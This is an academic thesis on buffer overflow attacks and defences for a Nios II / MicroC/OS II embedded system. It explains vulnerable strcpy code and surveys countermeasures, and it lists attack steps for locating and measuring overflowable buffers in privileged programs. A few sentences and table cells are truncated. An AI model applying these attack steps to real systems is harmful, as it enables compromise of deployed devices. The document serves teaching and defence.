Buffer Overflow Attack and Prevention for Embedded Systems

A Thesis submitted to the Graduate School of

The University of Cincinnati in partial fulfillment of the requirements for the degree of

Master of Science

in the Department of Electrical and Computer Engineering of the College of Engineering July 2011 by

Amjad Basha Sikiligiri B.Tech, National Institute of Technology Karnataka, Surathkal 2007

Committee Chair: Dr. Carla Purdy

ABSTRACT

Embedded systems today play a significant role in all aspects of our lives ranging from critical medical applications to multi-purpose handheld devices to simple room temperature controls.

Unfortunately, due to their ubiquity and characteristic features, embedded systems are prone to various security attacks. Software based security attacks, which target security loopholes in operating system and application software, are the most common security attacks because they are relatively easy and cost effective to implement.

Hence it's important for embedded system designers and application developers to know about existing security attacks so that they can avoid them in their designs. We survey various embedded system security attacks and present a detailed description of one class of software based security attacks, the buffer overflow attack. We demonstrate a stack based buffer overflow attack using the Altera Nios II softcore processor and the Micrium MicroC/OS II RTOS kernel. We also present a method to prevent such an attack for this specific system. This method can be modified to apply to a wide range of embedded systems products.


TABLE OF CONTENTS

1. INTRODUCTION

1.1 Motivation

1.2 Thesis Goals

1.3 Outline

2. BACKGROUND

2.1 Embedded systems security

2.2 Buffer overflow attack

2.2.1 Function calling

2.2.2 Vulnerabilities in a C program

2.2.3 The attack

2.2.4 Related attacks

2.2.5 Real world example: Apache htpasswd.c

2.2.6 Countermeasures for buffer overflow attacks

2.3 Altera Nios II processor

2.4 Micrium MicroC/OS II Kernel

2.5 System setup

3. PROCEDURES

3.1 Find an application with buffer overflow vulnerabilities

3.2 Find the effective buffer length

3.3 Find the address of the buffer (on stack)

3.4 Develop and inject the exploit string (code)

3.4.1 Choose a different set of instructions and types

3.4.2 Choose appropriate registers

3.4.3 Replace a single byte with a null byte during run time

3.4.4 Encode and decode the exploit code

3.5 attack countermeasure

3.5.1 Countermeasure implemented

3.5.2 Other approaches considered

3.6 Buffer overflow in complex programs

3.7 Conclusion

4. RESULTS

4.1 Initial stack address

4.2 The vulnerable program

4.3 The attack

4.4 The null byte problem

4.5 Prevention

4.6 Summary

5. CONCLUSIONS AND FUTURE WORK

5.1 Conclusions

5.2 Future Work

REFERENCES

APPENDIX A

Tutorial for Buffer Overflow Attack and Prevention in Embedded Systems

A.1 Nios II system

A.2 Attack steps

A.2.1 Approximate address of the buffer

A.2.2 The vulnerable application

A.2.3 Is the application buffer overflow vulnerable?

A.2.4 Effective buffer length

A.2.5 Develop and inject the exploit string

A.3 Prevention

LIST OF FIGURES

Figure 2.1: Function call in a C program using MicroC/OS II task

Figure 2.2: Disassembled C program

Figure 2.3: Prologue and epilogue for the function in Figure 2.1 [1]

Figure 2.4: Complete stack region after function call for the function in Figure 2.1

Figure 2.5: Buffer overflow

Figure 2.6: Vulnerable part of code in htpasswd.c utility for Apache server [46, 5]

Figure 3.1: Initial stack address

Figure 3.2: Buffer overflow without NOP Sled

Figure 3.3: Buffer overflow with NOP Sled

Figure 3.4: C Program to spawn a new shell [2, 54]

Figure 3.5: Nios II 'jmpi 0x20004e' equivalent instructions without null bytes

Figure 3.6: Exploit string structure in the stack frame

Figure 3.7: Exploit string structure with instructions appended

Figure 3.8: Instructions that replace non-null byte with null byte

Figure 3.9: Exploit string structure with decoder instructions appended

Figure 3.10: Decoder instructions

Figure 3.11: Program/process memory layout [71]

Figure 3.12: An example Nios II System [1]

Figure 3.13: Allocation of read/write memory region to SRAM using Nios IDE

Figure 3.14: Multiple task process control blocks [7]

Figure 4.1: C program to find stack address using MicroC/OS II

Figure 4.2: A buffer overflow vulnerable program

Figure 4.3: Exploit string

Figure 4.4: Nios II instructions that call sub routine at 0x0080030c

Figure 4.5: Exploit string components' length

Figure 4.6: Instructions in the exploit string

Figure 4.7: Exploit string binary equivalent of Figure 4.6

Figure 4.8: Program output for unsuccessful exploit string

Figure 4.9: Successful exploit string

Figure 4.10: Program output for successful exploit string

Figure 4.11: Exploit string with null byte

Figure 4.12: Modified exploit string to avoid RAW hazard

Figure 4.13: Exploit string binary equivalent of Figure 4.12

Figure 4.14: Multiple execution of 'critical_function'

Figure 4.15: Exploit string with an embedded decoder

Figure 4.16: Exploit string binary equivalent of Figure 4.15

Figure 4.17: Exploit string for an exclusive SRAM Nios II system

Figure 4.18: Instruction trace showing error fetching instruction

Figure A.1: Nios II system with all its components

Figure A.2: Nios II system with SRAM connected to data bus alone

Figure A.3: Nios II Instruction Trace debug feature

Figure A.4: Nios II system generation

Figure A.5: Programming the Cyclone FPGA

Figure A.6: Nios II project creation

Figure A.7: MicroC/OS II system library creation

Figure A.8: Nios II IDE Debug view

Figure A.9: Run the program in Debug view

Figure A.10: Instruction Stepping Mode

Figure A.11: Nios II register set

Figure A.12: Instruction step into mode

Figure A.13: Allocation of stack, text and other regions

Figure A.14: Memory monitor addition

Figure A.15: Exploit string in the memory

Figure A.16: Instruction trace showing error in execution

LIST OF TABLES

Table 2.1: Embedded systems attack types and specific countermeasures

Table 3.1: Available SRAM memory in Altera boards

Table 4.1: Exploit attempts with estimated return address

1. INTRODUCTION

1.1 Motivation

Buffer overflow attacks account for a major percentage of software based attacks [5, 14, 68, 69, 70] on embedded systems as well as on other computing systems [24]. A buffer is a fixed-size area allotted in program memory space. A buffer overflow happens when more data is written into the buffer than it can hold [5]; programs written in C, C++ and Perl are susceptible [4, 5, 43].

The attack involves corrupting the return address register of the processor [2, 4] or function pointers [4], and thereby changing the program execution order. The aim is to control the host system by subverting the function of a privileged program (a program with root access rights) [4].

In 2008, over 90% of the attacks recorded for [69, 70] and in 2007 approximately 15% of the security alerts issued by US-CERT (United States Computer Emergency Readiness Team) [68] were related to buffer overflows. The first documented instance of a buffer overflow attack [63] dates from 1988 and exploited the 'finger' daemon of the operating system.

Other real life examples include attacks against Microsoft's IIS web server [64] and SQL Server 2000 [65]. The PlayStation 2 had a buffer overflow vulnerability in the part of its BIOS that handled PS1 compatibility [67]. The "Twilight Hack" [66] in 2008 used a buffer overflow vulnerability to execute unofficial software without any hardware modifications.

Hence it's important to understand what a buffer overflow attack is and how it can be prevented.


1.2 Thesis Goals

This thesis aims to study buffer overflow attacks and to demonstrate the stack based buffer overflow attack using a specimen embedded system consisting of the Altera Nios II softcore processor [1] and the Micrium MicroC/OS II RTOS kernel [7]. It also aims to provide a method to prevent stack based buffer overflow attacks.

1.3 Outline

The thesis is organized as follows:

Chapter 2 provides background on various embedded system security attacks and countermeasures. It then describes in detail a class of software based attacks, buffer overflow attack and existing countermeasures. A brief overview of the embedded system used in this work is also presented.

Chapter 3 describes the steps involved in carrying out a stack based buffer overflow attack, including hindrances and workarounds. A pure hardware based preventive measure is then presented.

Chapter 4 gives the results of the attack and its prevention using the Altera Nios II processor and Micrium MicroC/OS II RTOS kernel embedded system.

Chapter 5 presents conclusions and future work that can be done.


2. BACKGROUND

In this chapter we briefly discuss embedded systems security and a class of attacks called software attacks. We give a detailed description of one type of software attack, the buffer overflow. We also describe the Altera Nios II processor and the Micrium MicroC/OS II kernel.

2.1 Embedded systems security

Embedded systems are vulnerable to various types of attacks due to characteristic features such as network connectivity, physical exposure, remoteness etc. [24].

The methods of attack are broadly classified into three types: logical, physical and side channel [24]. Side channel based attacks involve stealing information based on device properties such as power consumption, electromagnetic emissions and timing when the device is in operation [24].

Microprobing, reverse engineering, design theft and eavesdropping can be classified as physical attacks [24]. These types of attacks require physical access to the device [25].

Software and cryptographic attacks are two types of logical attacks [24]. Cryptographic attacks try to exploit the weakness of cryptographic protocols to steal information [24, 26].

Software attacks are the most common attacks due to their relative ease of implementation [24, 25]. These types of attacks take advantage of security loopholes in operating systems and application software [25]. Buffer overflow attacks [4], format string attacks [39] and integer overflows [39] are some examples of software attacks [24].


Table 2.1 summarizes various attacks and some of the prevention techniques using specially designed hardware, compiler modifications, operating system patches and software.

| Type of attack | Attack subtype | Hardware countermeasures | OS countermeasures | Compiler countermeasures | Software/algorithmic countermeasures |
|---|---|---|---|---|---|
| Software attacks | Buffer overflow | Process-specific randomized instruction sets [15]; hardware assisted run-time monitoring [27]; separate hardware stack to store return address [39] | Non-executable stacks [4, 17, 18, 20]; address space layout randomization [40] | [4]; canary values [4, 19] | Safe languages such as Cyclone [16]; code analyzer tools [24]; safe library functions [38] |
| Software attacks | Integer overflows | | | Compiler extension to monitor execution [57] | A safe integer arithmetic library [61] |
| Software attacks | Format string attacks | | | GCC compiler options [58] | Dataflow analysis and safe address white-lists [59]; FormatGuard wrapper functions [60] |
| Physical attacks | Design theft | Handshaking tokens [37] | | | Bit stream encryption [37] |
| Physical attacks | Microprobing | Destruction of test circuitry [36] | | | |
| Physical attacks | Reverse engineering | Unusual, custom and anonymous parts [35]; jumbled address and data buses [35] | | | |
| Physical attacks | Eavesdropping | Processors with encrypted global buses [34] | | | |
| Side channel attacks | EM analysis | Circuit redesign for EM shielding [33]; physically secure zones [29] | | | Dummy instructions insertion [31] |
| Side channel attacks | Timing analysis | Intel's AES instruction set [62] | | | Dummy instructions insertion [31]; message blinding [32] |
| Side channel attacks | Power analysis | Non-deterministic processor design [29]; window method of modular exponentiation [24, 28] | | | Transformed masking [30]; dummy instructions insertion [31] |

Table 2.1: Embedded systems attack types and specific countermeasures

2.2 Buffer overflow attack

In this work we concentrate on one particular type of software attack, the buffer overflow attack [24, 25], which is related to function calls and function pointers [4]. Any application which processes external input (from the user) using vulnerable library functions is susceptible to this kind of attack [51]. The attack tries to control the host by subverting the function of a privileged program [4].

2.2.1 Function calling

#include <stdio.h>
#include <string.h>

/* some work being done in this function */
void some_function(char *stringpassed)
{
    char name[50];

    strcpy(name, stringpassed);   /* no bounds check: the vulnerable call */
    printf("Processing called function....!!\n");
    return;
}

/* task calling a function */
void task1(void *pdata)
{
    some_function("input");
}

Figure 2.1: Function call in a C program using MicroC/OS II task

C programs containing function calls are effectively translated into a function prologue and epilogue when compiled. Consider the part of a hypothetical C program in Figure 2.1, which uses Micrium's MicroC/OS II kernel. This program has a task 'task1' calling a function 'some_function' with an argument. The function some_function copies the argument passed to the local variable 'name' and then prints a message. When compiled and disassembled, this part of the C program (Figure 2.1) is translated into Altera Nios II instructions as shown in Figure 2.2. Nios II and MicroC/OS II are described in Sections 2.3 and 2.4, respectively.

The physical implementation of function calls makes use of stacks. A stack is a type of process memory region where data is stored in Last In First Out (LIFO) fashion. Stacks can grow from higher to lower addresses or vice versa [2]. In the Nios II processor, the stack grows downward, from higher to lower addresses [1].

Stacks make use of two pointers for data access, the stack pointer and the frame pointer. Stack pointer (sp) is a pointer to the last used memory space. Frame pointer (fp) points to the saved frame pointer near the top of the stack frame [1]. Frame pointer in the case of Nios II is optional and can be eliminated for code optimization [1].

void some_function(char *stringpassed)
{
    addi sp,sp,-64
    stw  ra,60(sp)        Function prologue
    stw  fp,56(sp)
    addi fp,sp,56
    .
    .
    .
}
    ldw  ra,60(sp)
    ldw  fp,56(sp)        Function epilogue
    addi sp,sp,64
    ret

Figure 2.2: Disassembled C program


The function prologue helps in allocating a frame (a chunk of space) in the stack to store local variables, passed arguments, return address (ra) and frame pointer. Return address is the address of the instruction which needs to be executed after the current function call is completed.

In the case of the Nios II processor, the function prologue does the following [1]:

1. Adjust the stack pointer (to allocate the frame)

2. Store required registers to the frame

3. Set the frame pointer to the location of the saved frame pointer

A function epilogue is the counterpart of the prologue. The epilogue undoes the work done by the prologue when returning from the called function.

The concepts of prologue and epilogue are further explained in Figure 2.3 and Figure 2.4 for the program in Figure 2.1 and Figure 2.2.


Figure 2.3: Prologue and epilogue for the function in Figure 2.1 [1].

The area allocated for local variables, such as 'name' in Figure 2.1 and Figure 2.4, is usually referred to as a 'buffer' [2]. Note that 52 bytes are allotted to store 'name' instead of just 50 bytes, because compilers allocate memory in multiples of the word size, which is 32 bits (4 bytes) for Nios II.
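The rounding from 50 to 52 bytes can be checked with a few lines of C. This is a minimal sketch: the helper name round_up_to_word and the constant WORD_SIZE are illustrative and are not part of the Nios II toolchain.

```c
#include <assert.h>
#include <stddef.h>

#define WORD_SIZE 4u   /* Nios II word size in bytes (32 bits) */

/* Round a byte count up to the next multiple of WORD_SIZE.
 * Hypothetical helper used only to illustrate the arithmetic. */
static size_t round_up_to_word(size_t nbytes)
{
    assert(WORD_SIZE != 0u);
    return (nbytes + WORD_SIZE - 1u) / WORD_SIZE * WORD_SIZE;
}
```

Calling round_up_to_word(50) gives 52, while a size that is already a multiple of four, such as 52, is returned unchanged.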


Figure 2.4: Complete stack region after function call for the function in Figure 2.1

2.2.2 Vulnerabilities in a C program

The C language provides various string handling library functions, such as strcpy and strcat, in the string.h header file. The strcpy function copies a null terminated string from one memory location (called the source array) to another (the destination array) [21]. The prototype of strcpy is:

char * strcpy ( char * destination, const char * source ); [21]

The strcat function appends the source string to the destination string. The prototype of strcat is similar to that of strcpy [23].


strcpy and strcat do not perform bounds checking. In other words, these functions do not check the length of the input argument against the size of the destination. Therefore, when the input argument is larger than the destination variable, the excess data spills into adjacent memory regions.

For example, if we pass a 'stringpassed' containing more than 52 bytes, the data copied by strcpy can overflow into the memory region meant for 'fp' and/or 'ra' storage. Since the memory region is referred to as a buffer, the data overflow from the 'name' memory region into the 'fp' and/or 'ra' region is referred to as a "buffer overflow". A buffer overflow therefore allows us to change the return address of a function: when the processor pops the return address 'ra', it sees a different return address from the one initially stored on the stack. In this way we can change the flow of execution of the program [2]. Figure 2.5 shows the buffer overflow for the C program of Figure 2.1 when the input is 60 characters (bytes) of "A".
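The effect of the 60-character input can be reproduced safely on a host machine by modelling the stack frame as a plain byte array instead of overwriting a real stack. The sketch below takes the offsets of the saved fp and ra from Figure 2.2 and assumes, in addition, that 'name' occupies the 52 bytes directly below the saved fp. The names sim_frame, NAME_OFF, GUARD and the helper functions are illustrative.

```c
#include <stdint.h>
#include <string.h>

#define FRAME_SIZE 64   /* from "addi sp,sp,-64" in Figure 2.2            */
#define FP_OFF     56   /* from "stw fp,56(sp)"                           */
#define RA_OFF     60   /* from "stw ra,60(sp)"                           */
#define NAME_OFF    4   /* assumption: 'name' sits just below saved fp    */
#define GUARD       8   /* extra room so the model itself never overruns  */

struct sim_frame {
    unsigned char bytes[FRAME_SIZE + GUARD];
};

/* Store a 32-bit value into the simulated frame at a byte offset. */
static void put_word(struct sim_frame *f, size_t off, uint32_t value)
{
    memcpy(&f->bytes[off], &value, sizeof value);
}

/* Load a 32-bit value from the simulated frame at a byte offset. */
static uint32_t get_word(const struct sim_frame *f, size_t off)
{
    uint32_t value;
    memcpy(&value, &f->bytes[off], sizeof value);
    return value;
}

/* Mimic the prologue (save fp and ra), then the unchecked strcpy into
 * 'name'. Returns the return address the epilogue would load afterwards,
 * or 0 if the input is too long for this model to hold. */
static uint32_t simulate_call(struct sim_frame *f, const char *input,
                              uint32_t saved_fp, uint32_t saved_ra)
{
    if (strlen(input) >= sizeof f->bytes - NAME_OFF)
        return 0;

    memset(f->bytes, 0, sizeof f->bytes);
    put_word(f, FP_OFF, saved_fp);
    put_word(f, RA_OFF, saved_ra);

    strcpy((char *)&f->bytes[NAME_OFF], input);   /* no bounds check */

    return get_word(f, RA_OFF);
}
```

With a short input such as "input", simulate_call returns the saved return address unchanged. With 60 'A' characters, every byte of the saved fp and ra slots becomes 0x41, so the value returned is 0x41414141.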

Most vulnerabilities in a C program are related to buffer overflows and string manipulation, many resulting in a [3]. But attackers can create malicious input values specific to the target processor instruction set and environment to achieve illegal instruction execution [3].

Other C library functions like gets, scanf, sprintf are also buffer overflow prone [5, 41].
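One way to avoid the overflow is to bound every copy by the size of the destination. The following is a minimal sketch that uses only the standard snprintf function; the helper name copy_bounded and its convention for reporting truncation are illustrative and are not taken from the safe library functions of [38].

```c
#include <stdio.h>
#include <stddef.h>

/* Copy src into dst, never writing more than dst_size bytes (including
 * the terminating null). Returns 0 if the whole string fit, -1 if it was
 * truncated or the arguments were unusable. Hypothetical helper. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    int needed;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    needed = snprintf(dst, dst_size, "%s", src);
    if (needed < 0 || (size_t)needed >= dst_size)
        return -1;   /* output was cut short; dst is still null terminated */
    return 0;
}
```

In a function like some_function of Figure 2.1, the call copy_bounded(name, sizeof name, stringpassed) would truncate an oversized argument to 49 characters instead of writing past the end of 'name', and the caller can reject the input when -1 is returned.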


Figure 2.5: Buffer overflow

2.2.3 The attack

By corrupting the return address in the stack, the attacker can cause the program to jump to exploit code when the victim function returns [4]. This type of buffer overflow is called “stack smashing attack” [4].

Once the attacker overwrites the return address, they can choose which instructions are executed next, for example, instructions that spawn a new shell [2]. The instructions (exploit code) can be placed in the buffer that is overflowing, and the return address is then overwritten so that it points back into the buffer [2]. This form of attack is called an "Injected Code" attack [4, 9]. For example, instead of passing 60 characters of "A"s as shown in Figure 2.5, the attacker can pass characters representing binary instructions in hexadecimal notation (refer to Chapter 3 for details).

The code (instructions) to be injected can be generated manually, provided one has the target processor instruction set architecture knowledge. It can also be first written in the C language and then compiled and assembled to get the equivalent binary instructions [2].

2.2.4 Related attacks

There is another form of stack based buffer overflow attack known as the "Existing Code" or "return-to-libc" attack. In this type of attack, it's enough to overwrite the return address, because the code to be executed is already present in the program's memory space [4, 9]. The attacker need only parameterize the code and then cause the program to jump to it [4]. This thesis demonstrates code injection attacks [4, 9] but not existing code attacks.

Buffers can also be allocated in heap regions (variables allocated using malloc), and the corresponding buffer overflow attacks are known as heap based overflow attacks [6].

Programs written in C++ and Perl [4, 5, 43] are also susceptible to buffer overflow attacks.

2.2.5 Real world example: Apache htpasswd.c

There are many instances of buffer overflow attacks in real life [12]. An example is the Apache HTTP server's htpasswd.c program, which manipulates the password file for the Apache HTTP server [46]. This program was found to be susceptible to stack based buffer overflow attacks [5, 10, 11] when the binary has root permissions [11] or if the script is accessible through a CGI (Common Gateway Interface) [44].

The vulnerable part of the code takes the user-supplied 'user' and copies it to a fixed size local buffer using strcpy [45]. The vulnerable functions 'strcpy' and 'strcat' can be seen in the code fragment in Figure 2.6.

/* Make a password record from the given information */
static int mkrecord(char *user, char *record, size_t rlen, char *passwd, int alg)
{
    char *pw;
    char cpw[120];

    strcpy(record, user);
    strcat(record, ":");
    strcat(record, cpw);

    return 0;
}

int main(int argc, char *argv[])
{
    FILE *ftemp = NULL;
    FILE *fpw = NULL;
    char user[MAX_STRING_LEN];
    char password[MAX_STRING_LEN];
    char record[MAX_STRING_LEN];

}

Figure 2.6: Vulnerable part of code in htpasswd.c utility for Apache server [46, 5]


2.2.6 Countermeasures for buffer overflow attacks

Because buffer overflow attacks are so common, many countermeasure techniques have been proposed. Countermeasures take the form of custom processor architectures, operating system patches, compiler modifications, code analysis tools, etc. [14].

In [15], Kc et al. present an expensive approach to countering code injection attacks. The proposed approach is to encode the instruction stream in the executable file [15]. The instructions are decoded only when the processor is about to execute them [15]. Since the attacker does not know the key, and since every instruction is decoded before it is executed, the injected code does not correspond to the native processor instruction set once it has been decoded. Hence the attack is prevented.
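The idea can be illustrated with a toy model. The sketch below assumes a simple XOR scrambling of 32-bit instruction words with a secret key; this choice is made purely for illustration and is not claimed to be the exact scheme of [15]. The function names and any key value used with them are hypothetical.

```c
#include <stdint.h>
#include <stddef.h>

/* Scramble (or unscramble) a block of instruction words in place.
 * XOR is its own inverse, so one routine serves both directions. */
static void xor_words(uint32_t *words, size_t count, uint32_t key)
{
    size_t i;
    for (i = 0; i < count; i++)
        words[i] ^= key;
}

/* What the processor would execute for one fetched word: the fetch path
 * always applies the key, whether or not the word was encoded beforehand. */
static uint32_t decode_on_fetch(uint32_t fetched, uint32_t key)
{
    return fetched ^ key;
}
```

A legitimate program is passed through xor_words once when the executable is prepared, so decode_on_fetch restores each original word. A word injected by an attacker was never encoded, so for any non-zero key decode_on_fetch turns it into a different word from the one the attacker intended.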

SmashGuard [39] presents a hardware solution for attacks that target a function return address stored on the program stack. The approach involves storing the return address in an exclusive hardware stack for each function call and comparing it to the one on the program stack during return. Mismatch results in an exception [39].
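The comparison performed on each return can be modelled in software. The following is a minimal sketch of the push-on-call, compare-on-return behaviour described above; the structure, the capacity SHADOW_DEPTH and the function names are illustrative and do not describe the hardware design of [39].

```c
#include <stdint.h>
#include <stddef.h>

#define SHADOW_DEPTH 32   /* hypothetical capacity of the protected stack */

struct shadow_stack {
    uint32_t slots[SHADOW_DEPTH];
    size_t   top;          /* number of return addresses currently held */
};

/* On a call: record the return address. Returns 0 on success, -1 if full. */
static int shadow_push(struct shadow_stack *s, uint32_t ra)
{
    if (s->top >= SHADOW_DEPTH)
        return -1;
    s->slots[s->top++] = ra;
    return 0;
}

/* On a return: compare the address read from the program stack with the
 * protected copy. Returns 0 if they match, -1 on mismatch or underflow
 * (the point at which an exception would be raised). */
static int shadow_check_return(struct shadow_stack *s, uint32_t ra_from_stack)
{
    if (s->top == 0)
        return -1;
    return (s->slots[--s->top] == ra_from_stack) ? 0 : -1;
}
```

If an overflow has replaced the return address on the program stack, the value passed to shadow_check_return no longer matches the protected copy and the function reports the mismatch.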

Cyclone [16] is a safe dialect of C designed to counter buffer overflow attacks, among other vulnerabilities in C programs. There are also patches available for the Linux kernel [17, 18] and Solaris [20] that make stacks non-executable, hence preventing code injection attacks but not existing code attacks [4].

Address Space Layout Randomization (ASLR) randomizes the base addresses of various process memory segments, such as the stack, heap and dynamic libraries, at load and link time [40, 47]. Though this approach makes an attack significantly harder, it's not completely foolproof [40].

StackGuard [4, 19] is a gcc compiler modification which places a 'canary' value next to the 'return address' on the stack. If the attacker overflows the buffer to overwrite the legitimate return address, they also overwrite the stored canary value. The process is killed during function return if the canary is not the same as initially stored [4, 19].
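The canary check can be modelled on a host machine with a byte array standing in for the stack. The sketch below assumes a simplified layout in which the canary lies directly above a 52-byte buffer and the return address directly above the canary; the layout, the macro names and the function canary_survives are illustrative and are not taken from the StackGuard implementation.

```c
#include <stdint.h>
#include <string.h>

#define BUF_LEN     52                  /* local buffer, as in Figure 2.1    */
#define CANARY_OFF  (BUF_LEN)           /* canary right above the buffer     */
#define RA_OFF      (CANARY_OFF + 4)    /* return address above the canary   */
#define REGION_LEN  (RA_OFF + 4 + 16)   /* slack so the model never overruns */

/* Returns 1 if the canary survived the copy, 0 if it was clobbered.
 * 'canary' stands in for the value chosen when the function is entered. */
static int canary_survives(const char *input, uint32_t canary)
{
    unsigned char region[REGION_LEN] = {0};
    uint32_t after;

    if (strlen(input) >= REGION_LEN)
        return 0;                        /* too long for this model to hold */

    memcpy(&region[CANARY_OFF], &canary, sizeof canary);   /* prologue      */
    strcpy((char *)region, input);                         /* unchecked copy */
    memcpy(&after, &region[CANARY_OFF], sizeof after);     /* epilogue check */

    return after == canary;
}
```

A short input leaves the canary intact, so the function returns 1. An input of 60 characters cannot reach the return address slot without first running over the canary, so the function returns 0, which corresponds to the point where the process would be killed.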

2.3 Altera Nios II processor

Nios II is a configurable softcore RISC processor from Altera Corporation with a 32 bit instruction set architecture and 32 general purpose registers [1]. This processor can be synthesized on various embedded development boards offered by Altera, including the UP3 Educational Kit.

Altera's SOPC Builder design tool [13] can be used to configure the Nios II system with the required peripherals and processor core features. The Nios II processor core comes in three flavors: 'standard', 'economy' and 'fast' [1]. Each targets different critical requirements; for example, standard is less area demanding, while fast gives a high performance processor with large area requirements.

Custom instructions can also be added to the existing instruction set for performance critical applications [1].


2.4 Micrium MicroC/OS II Kernel

MicroC/OS II is a proprietary real time operating system kernel from Micrium targeted for embedded system applications [7]. It supports multitasking and is a priority based pre-emptive kernel [7].

Altera provides an evaluation version of MicroC/OS II free with the Nios II Embedded Development Suite (EDS) download [8]. Using EDS, this kernel can easily be ported to the Nios II processor to develop the required software.

Though Nios II has a Memory Management Unit (MMU) to help provide virtual memory for processes, MicroC/OS II as such does not provide virtual memory support for Nios II.

2.5 System setup

The Altera Nios II processor with the Micrium MicroC/OS II kernel is one of the most widely used embedded system platforms [49, 50]. MicroC/OS II as such does not offer any support for buffer overflow attack prevention [7], nor does it support virtual memory for processes [7].

This research makes use of the Altera Nios II embedded processor (using UP3 Cyclone FPGA platform [48]) and Micrium MicroC/OS II system for demonstrating the buffer overflow attack and preventive measures.

Since the Nios II processor is proprietary to the Altera Corporation, any countermeasure involving modification to the Nios II processor core hardware is not considered for implementation (because the results are not publishable).


Using a safe language is an option to consider, but most of the time embedded systems make use of off-the-shelf software (written in the C language [52]) and the designer might not have control over the source code. Also, it's not practical for all of the embedded software to be compiled using a single compiler which is immune to buffer overflow [51].

Instead, we implement a system level solution to prevent the attack by having a dedicated SRAM memory to be used by the function call stacks of the program. Altera's SOPC Builder is used to configure the required system. This solution is similar to the non-executable buffers discussed in [4, 17, 18, 20].
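The reasoning behind this solution can be sketched as a small model of the memory map. The sketch assumes that the stack SRAM is reachable only through the data bus, so that instruction fetches from it cannot succeed; the region addresses, sizes and all names below are placeholders chosen for illustration and do not describe the actual system configuration.

```c
#include <stdint.h>
#include <stddef.h>

struct mem_region {
    uint32_t base;
    uint32_t size;
    int on_instruction_bus;   /* 1 if the processor can fetch code from it */
    int on_data_bus;          /* 1 if loads and stores can reach it        */
};

/* Hypothetical memory map: addresses and sizes are placeholders. */
static const struct mem_region memory_map[] = {
    { 0x00800000u, 0x00100000u, 1, 1 },  /* SDRAM: program text and data  */
    { 0x00200000u, 0x00020000u, 0, 1 },  /* SRAM: function call stacks    */
};

/* Returns 1 if an instruction fetch from 'addr' can succeed, else 0. */
static int can_fetch(uint32_t addr)
{
    size_t i;
    for (i = 0; i < sizeof memory_map / sizeof memory_map[0]; i++) {
        const struct mem_region *r = &memory_map[i];
        if (addr >= r->base && addr - r->base < r->size)
            return r->on_instruction_bus;
    }
    return 0;   /* unmapped address */
}
```

In this model an overwritten return address that points into the stack region fails the can_fetch test, so exploit code placed in a stack buffer is never executed, while ordinary loads and stores to the stack are unaffected.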


3. PROCEDURES

This chapter first discusses various steps and hindrances involved in performing a buffer overflow attack (code injection attack). It then presents a possible countermeasure to prevent successful execution of the code injection attack.

We define the 'exploit string' as the input provided by the user, consisting of the exploit code and the new return address. The code injection attack requires passing the exploit string to the target program. The steps involved can roughly be divided as follows [2, 51, 53, 54]:

1. Find an application with buffer overflow vulnerabilities

2. Find the effective buffer length

3. Find the address of the buffer (on stack)

4. Develop and inject the exploit string (code)

3.1 Find an application with buffer overflow vulnerabilities

The attacker can start with open source programs and check the victim program for vulnerable library functions. Alternatively, since any program which accepts external input is potentially vulnerable, the attacker can experiment with the program by giving it some arbitrarily large input. If the program returns an error (for example, a segmentation violation in most modern operating systems) or simply malfunctions, the attacker has succeeded in this stage. In some cases, if the vulnerabilities are published in security related media, the attacker can exploit users who have not updated their application with the necessary security patches.


3.2 Find the effective buffer length

Similar to step 1 above, the attacker first starts with normal input to the vulnerable program. Then the size of the input is increased (or doubled) repeatedly to see if the program returns any error or malfunctions due to overflow. Once there is an overflow for an input of length, say, L, the attacker can decrease the size of the input step by step to figure out the exact length. Generally the effective buffer length is a few hundred bytes [2, 54].
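The search described above amounts to a doubling phase followed by a narrowing phase. The sketch below uses bisection for the narrowing phase, which is one possible way of decreasing the input size, and it assumes that once a length causes a fault every longer length does too. The callback type probe_fn, the stand-in model_probe and the constant MODEL_CAPACITY are hypothetical; in practice the probe would run the target program and observe its behaviour.

```c
#include <stddef.h>

#define MODEL_CAPACITY 52   /* stand-in: the buffer of Figure 2.1 */

/* Reports whether an input of 'len' bytes makes the target misbehave. */
typedef int (*probe_fn)(size_t len);

/* Stand-in probe that models a target faulting beyond MODEL_CAPACITY. */
static int model_probe(size_t len)
{
    return len > MODEL_CAPACITY;
}

/* Find the smallest input length for which 'probe' reports a fault.
 * Phase 1 doubles the length until a fault appears; phase 2 bisects
 * between the last good and the first bad length. Returns 0 if no fault
 * is seen at any tested length up to 'limit'. */
static size_t smallest_faulting_length(probe_fn probe, size_t limit)
{
    size_t good = 0;   /* longest length known not to fault */
    size_t bad  = 1;   /* length currently being tested     */

    if (limit == 0)
        return 0;

    while (!probe(bad)) {
        good = bad;
        if (bad > limit / 2)
            return 0;
        bad *= 2;
    }

    while (bad - good > 1) {
        size_t mid = good + (bad - good) / 2;
        if (probe(mid))
            bad = mid;
        else
            good = mid;
    }
    return bad;
}
```

With the stand-in probe, the doubling phase stops at 64 and the bisection narrows the result to 53, the first length that no longer fits in 52 bytes.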

In [53], Ogorkiewicz and Frej present an interesting and possibly easier way to find the length of the buffer for a specific operating system. The approach involves interpreting the error message thrown by the operating system when the overflow occurs.

3.3 Find the address of the buffer (on stack)

The attacker need not find the exact address of the vulnerable buffer; an approximation will do. This step makes use of the fact that, for a given operating system and processor, all programs have approximately the same starting address for their stacks [2]. Also, most programs push a few hundred to a few thousand bytes onto the stack [2, 54]. Hence the address of the buffer should be somewhere around this initial starting address.

The stack starting address [2] can be found using the code shown in Figure 3.1 (the program is specific to the Nios II processor and MicroC/OS II kernel). This code has 'task1' calling a function 'find_sp'. The function 'find_sp' moves the value of the stack pointer (sp) into the general purpose register r2 and returns it at the completion of the function. Then the task 'task1' prints the returned stack address in hexadecimal notation. Note that we cannot use an arbitrary register such as r5 or r21 in place of r2: Nios II returns values of up to 8 bytes in the r2 and r3 registers [1], hence we need to use r2.

Most attacks target a privileged program, such as a SUID root program [4, 39, 54], so that the attackers can spawn a new shell or do other operations with root privileges. The attacker will first execute the program in Figure 3.1 with normal user permissions and then use this information for the attack on a program with root permissions.

/* move the value of sp to r2 register; r2 carries the return value on
   Nios II, so no explicit return statement is used */
unsigned long find_sp(void)
{
    asm(" mov r2, sp");
}

/* Prints value of stack address */
void task1(void *pdata)
{
    printf("0x%lx\n", find_sp());
}

Figure 3.1: Initial stack address

